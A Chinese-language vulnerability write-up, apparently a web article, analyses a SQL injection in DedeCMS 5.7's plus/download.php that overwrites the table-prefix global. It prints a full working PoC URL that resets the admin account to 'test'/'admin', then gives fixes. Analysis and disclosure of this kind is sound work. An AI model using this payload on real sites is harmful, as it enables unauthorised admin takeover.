首先看这个if判断,意思是如果开启了mysqli扩展,则包含dedesqli.class.php。这里存在漏洞的代码在dedesql.class.php中,所以漏洞利用的前提条件是必须关闭mysqli扩展。
这里跟入dedesql.class.php代码,如图
这里我们传入的arrs1、arrs2两个数组因为还没有被初始化,所以这里$v1、$v2拼接为字符串,如图所示
所以执行到这里$GLOBALS['cfg_dbprefix']被覆盖为
admin` SET `userid`=’test’, `pwd`=’f297a57a5a743894a0e4′ where id=1 #
继续跟踪代码执行,
跟入ExecuteNoneQuery2函数,一直跟进SetQuery,如图
这里因为$GLOBALS['cfg_dbprefix']是我们可控的,所以就造成了注入,这里看一下$sql的值,如图所示
因为ExecuteNoneQuery2函数没有使用mysql-ids进行过滤,所以这里借助它来注入。执行update成功之后,后台账户为test,密码为admin。
三. 漏洞验证
PoC:
http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
验证截图:
四. 漏洞修复
0×01、修改php.ini,确保开启php_mysqli.dll扩展。
0×02、修改/include/dedesql.class.php中的代码,如下所示
require_once(DEDEINC.’/common.func.php’);
//引入数据库类
if ($GLOBALS['cfg_mysql_type'] == ‘mysqli’ && function_exists(“mysqli_init”))
{
//echo $GLOBALS['cfg_mysql_type'];
//exit;
require_once(DEDEINC.’/dedesqli.class.php’);
} else {
require_once(DEDEINC.’/dedesql.class.php’);
}
//require_once(DEDEINC.’/common.func.php’);
标签:织梦DedeCMS
相关阅读 >>
dedecms织梦模板用array调用多个自定义字段并判断的方法
dedecms内容模型自定义字段在{dedearclist}中调用不显示的解决方法
更多相关阅读请进入《织梦DedeCMS》频道 >>
